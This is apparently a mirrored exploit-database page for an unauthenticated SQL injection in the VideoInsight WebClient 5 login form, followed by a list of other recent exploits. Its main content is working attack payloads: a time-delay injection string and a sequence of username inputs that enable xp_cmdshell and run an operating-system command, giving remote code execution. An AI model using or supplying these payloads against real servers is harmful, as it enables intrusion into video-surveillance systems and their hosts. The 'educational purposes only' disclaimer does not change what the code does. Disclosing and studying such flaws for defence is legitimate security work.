Videoinsight webclient 5 sql injection Vulnerability / Exploit

  /     /     /  

Exploits / Vulnerability Discovered : 2018-06-20 | Type : webapps | Platform : windows
This exploit / vulnerability Videoinsight webclient 5 sql injection is for educational purposes only and if it is used you will do on your own risk!

[+] Code ...

# Title: VideoInsight WebClient 5 - SQL Injection
# Date: 2018-05-06
# Author: vosec
# Vendor Homepage: https://www.security.us.panasonic.com/
# Software Link: https://www.security.us.panasonic.com/video-management-software/web-client/
# Version: 5
# Tested on: Windows Server 2008 R2
# CVE: N/A

# Description:
# This exploit is based on CVE-2017-5151 targeting versions prior.
# The txtUserName and possibly txtPassword field contain an unauthenticated SQL injection vulnerability
# that can be used for remote code execution.

# SQL Injection - PoC
# From the web login page submit the following string as the username with anything in the password field.
# The web server will hang for 5 seconds:

UyYr');WAITFOR DELAY '00:00:05'--

# Remote Code Execution - PoC
# From the web login page submit each of the following strings as the username, one at a time, with anything
# in the password field (with the ping, use a valid IP address that you can monitor):
UyYr');EXEC sp_configure 'show advanced options', 1;RECONFIGURE;--
UyYr');EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;--
UyYr');EXEC xp_cmdshell 'ping xxx.xxx.xxx.xxx';--

Videoinsight webclient 5 sql injection


Last added Exploits Vulnerabilities

▸ soplanning 1.52.01 (simple online planning tool) - remote code execution (rce) (authenticated) ◂
Discovered: 2024-11-15
Type: webapps
Platform: php
▸ rengine 2.2.0 - command injection (authenticated) ◂
Discovered: 2024-10-01
Type: webapps
Platform: multiple
▸ opensis 9.1 - sqli (authenticated) ◂
Discovered: 2024-10-01
Type: webapps
Platform: php



Tags:
Videoinsight webclient 5 sql injection Vulnerability / Exploit